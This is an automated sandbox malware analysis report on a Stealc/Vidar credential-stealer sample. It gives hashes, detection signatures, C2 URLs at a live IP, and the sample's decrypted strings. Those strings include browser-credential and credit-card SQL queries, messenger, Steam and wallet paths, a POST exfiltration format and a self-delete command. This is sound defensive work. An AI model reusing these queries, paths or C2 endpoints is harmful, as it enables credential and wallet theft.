Windows Analysis Report
i3NmF0obCm.exe

Overview

General Information

Sample name:	i3NmF0obCm.exe renamed because original name is a hash value
Original sample name:	253ccac8a47b80287f651987c0c779ea.exe
Analysis ID:	1465851
MD5:	253ccac8a47b80287f651987c0c779ea
SHA1:	11db405849dbaa9b3759de921835df20fab35bc3
SHA256:	262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
Tags:	32exetrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

PE file has a writeable .text section

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: i3NmF0obCm.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://40.86.87.10/108e010e8f91c38c.php%	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php(	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php9	Avira URL Cloud: Label: malware
Source: http://40.86.87.10	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php2	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllowser	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll$	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php~	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllL	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phposition:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpe	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpirefox	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllllU	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpI	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllQ	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php-LTC	Avira URL Cloud: Label: malware

Found malware configuration

Source: i3NmF0obCm.exe	Malware Configuration Extractor: Vidar {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}
Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}

Multi AV Scanner detection for submitted file

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%			Perma Link
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: i3NmF0obCm.exe	String decryptor: INSERT_KEY_HERE
Source: i3NmF0obCm.exe	String decryptor: GetProcAddress
Source: i3NmF0obCm.exe	String decryptor: LoadLibraryA
Source: i3NmF0obCm.exe	String decryptor: lstrcatA
Source: i3NmF0obCm.exe	String decryptor: OpenEventA
Source: i3NmF0obCm.exe	String decryptor: CreateEventA
Source: i3NmF0obCm.exe	String decryptor: CloseHandle
Source: i3NmF0obCm.exe	String decryptor: Sleep
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLangID
Source: i3NmF0obCm.exe	String decryptor: VirtualAllocExNuma
Source: i3NmF0obCm.exe	String decryptor: VirtualFree
Source: i3NmF0obCm.exe	String decryptor: GetSystemInfo
Source: i3NmF0obCm.exe	String decryptor: VirtualAlloc
Source: i3NmF0obCm.exe	String decryptor: HeapAlloc
Source: i3NmF0obCm.exe	String decryptor: GetComputerNameA
Source: i3NmF0obCm.exe	String decryptor: lstrcpyA
Source: i3NmF0obCm.exe	String decryptor: GetProcessHeap
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcess
Source: i3NmF0obCm.exe	String decryptor: lstrlenA
Source: i3NmF0obCm.exe	String decryptor: ExitProcess
Source: i3NmF0obCm.exe	String decryptor: GlobalMemoryStatusEx
Source: i3NmF0obCm.exe	String decryptor: GetSystemTime
Source: i3NmF0obCm.exe	String decryptor: SystemTimeToFileTime
Source: i3NmF0obCm.exe	String decryptor: advapi32.dll
Source: i3NmF0obCm.exe	String decryptor: gdi32.dll
Source: i3NmF0obCm.exe	String decryptor: user32.dll
Source: i3NmF0obCm.exe	String decryptor: crypt32.dll
Source: i3NmF0obCm.exe	String decryptor: ntdll.dll
Source: i3NmF0obCm.exe	String decryptor: GetUserNameA
Source: i3NmF0obCm.exe	String decryptor: CreateDCA
Source: i3NmF0obCm.exe	String decryptor: GetDeviceCaps
Source: i3NmF0obCm.exe	String decryptor: ReleaseDC
Source: i3NmF0obCm.exe	String decryptor: CryptStringToBinaryA
Source: i3NmF0obCm.exe	String decryptor: sscanf
Source: i3NmF0obCm.exe	String decryptor: VMwareVMware
Source: i3NmF0obCm.exe	String decryptor: HAL9TH
Source: i3NmF0obCm.exe	String decryptor: JohnDoe
Source: i3NmF0obCm.exe	String decryptor: DISPLAY
Source: i3NmF0obCm.exe	String decryptor: %hu/%hu/%hu
Source: i3NmF0obCm.exe	String decryptor: http://40.86.87.10
Source: i3NmF0obCm.exe	String decryptor: /108e010e8f91c38c.php
Source: i3NmF0obCm.exe	String decryptor: /b13597c85f807692/
Source: i3NmF0obCm.exe	String decryptor: GetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: GetFileAttributesA
Source: i3NmF0obCm.exe	String decryptor: GlobalLock
Source: i3NmF0obCm.exe	String decryptor: HeapFree
Source: i3NmF0obCm.exe	String decryptor: GetFileSize
Source: i3NmF0obCm.exe	String decryptor: GlobalSize
Source: i3NmF0obCm.exe	String decryptor: CreateToolhelp32Snapshot
Source: i3NmF0obCm.exe	String decryptor: IsWow64Process
Source: i3NmF0obCm.exe	String decryptor: Process32Next
Source: i3NmF0obCm.exe	String decryptor: GetLocalTime
Source: i3NmF0obCm.exe	String decryptor: FreeLibrary
Source: i3NmF0obCm.exe	String decryptor: GetTimeZoneInformation
Source: i3NmF0obCm.exe	String decryptor: GetSystemPowerStatus
Source: i3NmF0obCm.exe	String decryptor: GetVolumeInformationA
Source: i3NmF0obCm.exe	String decryptor: GetWindowsDirectoryA
Source: i3NmF0obCm.exe	String decryptor: Process32First
Source: i3NmF0obCm.exe	String decryptor: GetLocaleInfoA
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLocaleName
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameA
Source: i3NmF0obCm.exe	String decryptor: DeleteFileA
Source: i3NmF0obCm.exe	String decryptor: FindNextFileA
Source: i3NmF0obCm.exe	String decryptor: LocalFree
Source: i3NmF0obCm.exe	String decryptor: FindClose
Source: i3NmF0obCm.exe	String decryptor: SetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: LocalAlloc
Source: i3NmF0obCm.exe	String decryptor: GetFileSizeEx
Source: i3NmF0obCm.exe	String decryptor: ReadFile
Source: i3NmF0obCm.exe	String decryptor: SetFilePointer
Source: i3NmF0obCm.exe	String decryptor: WriteFile
Source: i3NmF0obCm.exe	String decryptor: CreateFileA
Source: i3NmF0obCm.exe	String decryptor: FindFirstFileA
Source: i3NmF0obCm.exe	String decryptor: CopyFileA
Source: i3NmF0obCm.exe	String decryptor: VirtualProtect
Source: i3NmF0obCm.exe	String decryptor: GetLogicalProcessorInformationEx
Source: i3NmF0obCm.exe	String decryptor: GetLastError
Source: i3NmF0obCm.exe	String decryptor: lstrcpynA
Source: i3NmF0obCm.exe	String decryptor: MultiByteToWideChar
Source: i3NmF0obCm.exe	String decryptor: GlobalFree
Source: i3NmF0obCm.exe	String decryptor: WideCharToMultiByte
Source: i3NmF0obCm.exe	String decryptor: GlobalAlloc
Source: i3NmF0obCm.exe	String decryptor: OpenProcess
Source: i3NmF0obCm.exe	String decryptor: TerminateProcess
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcessId
Source: i3NmF0obCm.exe	String decryptor: gdiplus.dll
Source: i3NmF0obCm.exe	String decryptor: ole32.dll
Source: i3NmF0obCm.exe	String decryptor: bcrypt.dll
Source: i3NmF0obCm.exe	String decryptor: wininet.dll
Source: i3NmF0obCm.exe	String decryptor: shlwapi.dll
Source: i3NmF0obCm.exe	String decryptor: shell32.dll
Source: i3NmF0obCm.exe	String decryptor: psapi.dll
Source: i3NmF0obCm.exe	String decryptor: rstrtmgr.dll
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleBitmap
Source: i3NmF0obCm.exe	String decryptor: SelectObject
Source: i3NmF0obCm.exe	String decryptor: BitBlt
Source: i3NmF0obCm.exe	String decryptor: DeleteObject
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleDC
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncodersSize
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncoders
Source: i3NmF0obCm.exe	String decryptor: GdipCreateBitmapFromHBITMAP
Source: i3NmF0obCm.exe	String decryptor: GdiplusStartup
Source: i3NmF0obCm.exe	String decryptor: GdiplusShutdown
Source: i3NmF0obCm.exe	String decryptor: GdipSaveImageToStream
Source: i3NmF0obCm.exe	String decryptor: GdipDisposeImage
Source: i3NmF0obCm.exe	String decryptor: GdipFree
Source: i3NmF0obCm.exe	String decryptor: GetHGlobalFromStream
Source: i3NmF0obCm.exe	String decryptor: CreateStreamOnHGlobal
Source: i3NmF0obCm.exe	String decryptor: CoUninitialize
Source: i3NmF0obCm.exe	String decryptor: CoInitialize
Source: i3NmF0obCm.exe	String decryptor: CoCreateInstance
Source: i3NmF0obCm.exe	String decryptor: BCryptGenerateSymmetricKey
Source: i3NmF0obCm.exe	String decryptor: BCryptCloseAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: BCryptDecrypt
Source: i3NmF0obCm.exe	String decryptor: BCryptSetProperty
Source: i3NmF0obCm.exe	String decryptor: BCryptDestroyKey
Source: i3NmF0obCm.exe	String decryptor: BCryptOpenAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: GetWindowRect
Source: i3NmF0obCm.exe	String decryptor: GetDesktopWindow
Source: i3NmF0obCm.exe	String decryptor: GetDC
Source: i3NmF0obCm.exe	String decryptor: CloseWindow
Source: i3NmF0obCm.exe	String decryptor: wsprintfA
Source: i3NmF0obCm.exe	String decryptor: EnumDisplayDevicesA
Source: i3NmF0obCm.exe	String decryptor: GetKeyboardLayoutList
Source: i3NmF0obCm.exe	String decryptor: CharToOemW
Source: i3NmF0obCm.exe	String decryptor: wsprintfW
Source: i3NmF0obCm.exe	String decryptor: RegQueryValueExA
Source: i3NmF0obCm.exe	String decryptor: RegEnumKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegOpenKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegCloseKey
Source: i3NmF0obCm.exe	String decryptor: RegEnumValueA
Source: i3NmF0obCm.exe	String decryptor: CryptBinaryToStringA
Source: i3NmF0obCm.exe	String decryptor: CryptUnprotectData
Source: i3NmF0obCm.exe	String decryptor: SHGetFolderPathA
Source: i3NmF0obCm.exe	String decryptor: ShellExecuteExA
Source: i3NmF0obCm.exe	String decryptor: InternetOpenUrlA
Source: i3NmF0obCm.exe	String decryptor: InternetConnectA
Source: i3NmF0obCm.exe	String decryptor: InternetCloseHandle
Source: i3NmF0obCm.exe	String decryptor: InternetOpenA
Source: i3NmF0obCm.exe	String decryptor: HttpSendRequestA
Source: i3NmF0obCm.exe	String decryptor: HttpOpenRequestA
Source: i3NmF0obCm.exe	String decryptor: InternetReadFile
Source: i3NmF0obCm.exe	String decryptor: InternetCrackUrlA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCA
Source: i3NmF0obCm.exe	String decryptor: StrStrA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCW
Source: i3NmF0obCm.exe	String decryptor: PathMatchSpecA
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameExA
Source: i3NmF0obCm.exe	String decryptor: RmStartSession
Source: i3NmF0obCm.exe	String decryptor: RmRegisterResources
Source: i3NmF0obCm.exe	String decryptor: RmGetList
Source: i3NmF0obCm.exe	String decryptor: RmEndSession
Source: i3NmF0obCm.exe	String decryptor: sqlite3_open
Source: i3NmF0obCm.exe	String decryptor: sqlite3_prepare_v2
Source: i3NmF0obCm.exe	String decryptor: sqlite3_step
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_text
Source: i3NmF0obCm.exe	String decryptor: sqlite3_finalize
Source: i3NmF0obCm.exe	String decryptor: sqlite3_close
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_bytes
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_blob
Source: i3NmF0obCm.exe	String decryptor: encrypted_key
Source: i3NmF0obCm.exe	String decryptor: PATH
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\nss3.dll
Source: i3NmF0obCm.exe	String decryptor: NSS_Init
Source: i3NmF0obCm.exe	String decryptor: NSS_Shutdown
Source: i3NmF0obCm.exe	String decryptor: PK11_GetInternalKeySlot
Source: i3NmF0obCm.exe	String decryptor: PK11_FreeSlot
Source: i3NmF0obCm.exe	String decryptor: PK11_Authenticate
Source: i3NmF0obCm.exe	String decryptor: PK11SDR_Decrypt
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\
Source: i3NmF0obCm.exe	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: i3NmF0obCm.exe	String decryptor: browser:
Source: i3NmF0obCm.exe	String decryptor: profile:
Source: i3NmF0obCm.exe	String decryptor: url:
Source: i3NmF0obCm.exe	String decryptor: login:
Source: i3NmF0obCm.exe	String decryptor: password:
Source: i3NmF0obCm.exe	String decryptor: Opera
Source: i3NmF0obCm.exe	String decryptor: OperaGX
Source: i3NmF0obCm.exe	String decryptor: Network
Source: i3NmF0obCm.exe	String decryptor: cookies
Source: i3NmF0obCm.exe	String decryptor: .txt
Source: i3NmF0obCm.exe	String decryptor: TRUE
Source: i3NmF0obCm.exe	String decryptor: FALSE
Source: i3NmF0obCm.exe	String decryptor: autofill
Source: i3NmF0obCm.exe	String decryptor: SELECT name, value FROM autofill
Source: i3NmF0obCm.exe	String decryptor: history
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM urls LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: i3NmF0obCm.exe	String decryptor: name:
Source: i3NmF0obCm.exe	String decryptor: month:
Source: i3NmF0obCm.exe	String decryptor: year:
Source: i3NmF0obCm.exe	String decryptor: card:
Source: i3NmF0obCm.exe	String decryptor: Cookies
Source: i3NmF0obCm.exe	String decryptor: Login Data
Source: i3NmF0obCm.exe	String decryptor: Web Data
Source: i3NmF0obCm.exe	String decryptor: History
Source: i3NmF0obCm.exe	String decryptor: logins.json
Source: i3NmF0obCm.exe	String decryptor: formSubmitURL
Source: i3NmF0obCm.exe	String decryptor: usernameField
Source: i3NmF0obCm.exe	String decryptor: encryptedUsername
Source: i3NmF0obCm.exe	String decryptor: encryptedPassword
Source: i3NmF0obCm.exe	String decryptor: guid
Source: i3NmF0obCm.exe	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: i3NmF0obCm.exe	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: cookies.sqlite
Source: i3NmF0obCm.exe	String decryptor: formhistory.sqlite
Source: i3NmF0obCm.exe	String decryptor: places.sqlite
Source: i3NmF0obCm.exe	String decryptor: plugins
Source: i3NmF0obCm.exe	String decryptor: Local Extension Settings
Source: i3NmF0obCm.exe	String decryptor: Sync Extension Settings
Source: i3NmF0obCm.exe	String decryptor: IndexedDB
Source: i3NmF0obCm.exe	String decryptor: Opera Stable
Source: i3NmF0obCm.exe	String decryptor: Opera GX Stable
Source: i3NmF0obCm.exe	String decryptor: CURRENT
Source: i3NmF0obCm.exe	String decryptor: chrome-extension_
Source: i3NmF0obCm.exe	String decryptor: _0.indexeddb.leveldb
Source: i3NmF0obCm.exe	String decryptor: Local State
Source: i3NmF0obCm.exe	String decryptor: profiles.ini
Source: i3NmF0obCm.exe	String decryptor: chrome
Source: i3NmF0obCm.exe	String decryptor: opera
Source: i3NmF0obCm.exe	String decryptor: firefox
Source: i3NmF0obCm.exe	String decryptor: wallets
Source: i3NmF0obCm.exe	String decryptor: %08lX%04lX%lu
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: i3NmF0obCm.exe	String decryptor: ProductName
Source: i3NmF0obCm.exe	String decryptor: %d/%d/%d %d:%d:%d
Source: i3NmF0obCm.exe	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: i3NmF0obCm.exe	String decryptor: ProcessorNameString
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: i3NmF0obCm.exe	String decryptor: DisplayName
Source: i3NmF0obCm.exe	String decryptor: DisplayVersion
Source: i3NmF0obCm.exe	String decryptor: Network Info:
Source: i3NmF0obCm.exe	String decryptor: - IP: IP?
Source: i3NmF0obCm.exe	String decryptor: - Country: ISO?
Source: i3NmF0obCm.exe	String decryptor: System Summary:
Source: i3NmF0obCm.exe	String decryptor: - HWID:
Source: i3NmF0obCm.exe	String decryptor: - OS:
Source: i3NmF0obCm.exe	String decryptor: - Architecture:
Source: i3NmF0obCm.exe	String decryptor: - UserName:
Source: i3NmF0obCm.exe	String decryptor: - Computer Name:
Source: i3NmF0obCm.exe	String decryptor: - Local Time:
Source: i3NmF0obCm.exe	String decryptor: - UTC:
Source: i3NmF0obCm.exe	String decryptor: - Language:
Source: i3NmF0obCm.exe	String decryptor: - Keyboards:
Source: i3NmF0obCm.exe	String decryptor: - Laptop:
Source: i3NmF0obCm.exe	String decryptor: - Running Path:
Source: i3NmF0obCm.exe	String decryptor: - CPU:
Source: i3NmF0obCm.exe	String decryptor: - Threads:
Source: i3NmF0obCm.exe	String decryptor: - Cores:
Source: i3NmF0obCm.exe	String decryptor: - RAM:
Source: i3NmF0obCm.exe	String decryptor: - Display Resolution:
Source: i3NmF0obCm.exe	String decryptor: - GPU:
Source: i3NmF0obCm.exe	String decryptor: User Agents:
Source: i3NmF0obCm.exe	String decryptor: Installed Apps:
Source: i3NmF0obCm.exe	String decryptor: All Users:
Source: i3NmF0obCm.exe	String decryptor: Current User:
Source: i3NmF0obCm.exe	String decryptor: Process List:
Source: i3NmF0obCm.exe	String decryptor: system_info.txt
Source: i3NmF0obCm.exe	String decryptor: freebl3.dll
Source: i3NmF0obCm.exe	String decryptor: mozglue.dll
Source: i3NmF0obCm.exe	String decryptor: msvcp140.dll
Source: i3NmF0obCm.exe	String decryptor: nss3.dll
Source: i3NmF0obCm.exe	String decryptor: softokn3.dll
Source: i3NmF0obCm.exe	String decryptor: vcruntime140.dll
Source: i3NmF0obCm.exe	String decryptor: \Temp\
Source: i3NmF0obCm.exe	String decryptor: .exe
Source: i3NmF0obCm.exe	String decryptor: runas
Source: i3NmF0obCm.exe	String decryptor: open
Source: i3NmF0obCm.exe	String decryptor: /c start
Source: i3NmF0obCm.exe	String decryptor: %DESKTOP%
Source: i3NmF0obCm.exe	String decryptor: %APPDATA%
Source: i3NmF0obCm.exe	String decryptor: %LOCALAPPDATA%
Source: i3NmF0obCm.exe	String decryptor: %USERPROFILE%
Source: i3NmF0obCm.exe	String decryptor: %DOCUMENTS%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES_86%
Source: i3NmF0obCm.exe	String decryptor: %RECENT%
Source: i3NmF0obCm.exe	String decryptor: *.lnk
Source: i3NmF0obCm.exe	String decryptor: files
Source: i3NmF0obCm.exe	String decryptor: \discord\
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb\CURRENT
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb
Source: i3NmF0obCm.exe	String decryptor: \Telegram Desktop\
Source: i3NmF0obCm.exe	String decryptor: key_datas
Source: i3NmF0obCm.exe	String decryptor: D877F783D5D3EF8C*
Source: i3NmF0obCm.exe	String decryptor: map*
Source: i3NmF0obCm.exe	String decryptor: A7FDF864FBC10B77*
Source: i3NmF0obCm.exe	String decryptor: A92DAA6EA6F891F2*
Source: i3NmF0obCm.exe	String decryptor: F8806DD0C461824F*
Source: i3NmF0obCm.exe	String decryptor: Telegram
Source: i3NmF0obCm.exe	String decryptor: *.tox
Source: i3NmF0obCm.exe	String decryptor: *.ini
Source: i3NmF0obCm.exe	String decryptor: Password
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: 00000001
Source: i3NmF0obCm.exe	String decryptor: 00000002
Source: i3NmF0obCm.exe	String decryptor: 00000003
Source: i3NmF0obCm.exe	String decryptor: 00000004
Source: i3NmF0obCm.exe	String decryptor: \Outlook\accounts.txt
Source: i3NmF0obCm.exe	String decryptor: Pidgin
Source: i3NmF0obCm.exe	String decryptor: \.purple\
Source: i3NmF0obCm.exe	String decryptor: accounts.xml
Source: i3NmF0obCm.exe	String decryptor: dQw4w9WgXcQ
Source: i3NmF0obCm.exe	String decryptor: token:
Source: i3NmF0obCm.exe	String decryptor: Software\Valve\Steam
Source: i3NmF0obCm.exe	String decryptor: SteamPath
Source: i3NmF0obCm.exe	String decryptor: \config\
Source: i3NmF0obCm.exe	String decryptor: ssfn*
Source: i3NmF0obCm.exe	String decryptor: config.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfig.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfigOverlay*.vdf
Source: i3NmF0obCm.exe	String decryptor: libraryfolders.vdf
Source: i3NmF0obCm.exe	String decryptor: loginusers.vdf
Source: i3NmF0obCm.exe	String decryptor: \Steam\
Source: i3NmF0obCm.exe	String decryptor: sqlite3.dll
Source: i3NmF0obCm.exe	String decryptor: browsers
Source: i3NmF0obCm.exe	String decryptor: done
Source: i3NmF0obCm.exe	String decryptor: soft
Source: i3NmF0obCm.exe	String decryptor: \Discord\tokens.txt
Source: i3NmF0obCm.exe	String decryptor: /c timeout /t 5 & del /f /q "
Source: i3NmF0obCm.exe	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: i3NmF0obCm.exe	String decryptor: C:\Windows\system32\cmd.exe
Source: i3NmF0obCm.exe	String decryptor: https
Source: i3NmF0obCm.exe	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: i3NmF0obCm.exe	String decryptor: POST
Source: i3NmF0obCm.exe	String decryptor: HTTP/1.1
Source: i3NmF0obCm.exe	String decryptor: Content-Disposition: form-data; name="
Source: i3NmF0obCm.exe	String decryptor: hwid
Source: i3NmF0obCm.exe	String decryptor: build
Source: i3NmF0obCm.exe	String decryptor: token
Source: i3NmF0obCm.exe	String decryptor: file_name
Source: i3NmF0obCm.exe	String decryptor: file
Source: i3NmF0obCm.exe	String decryptor: message
Source: i3NmF0obCm.exe	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: i3NmF0obCm.exe	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE9560 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00EE9560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE94C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00EE94C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE6C40 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00EE6C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF6DB0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00EF6DB0
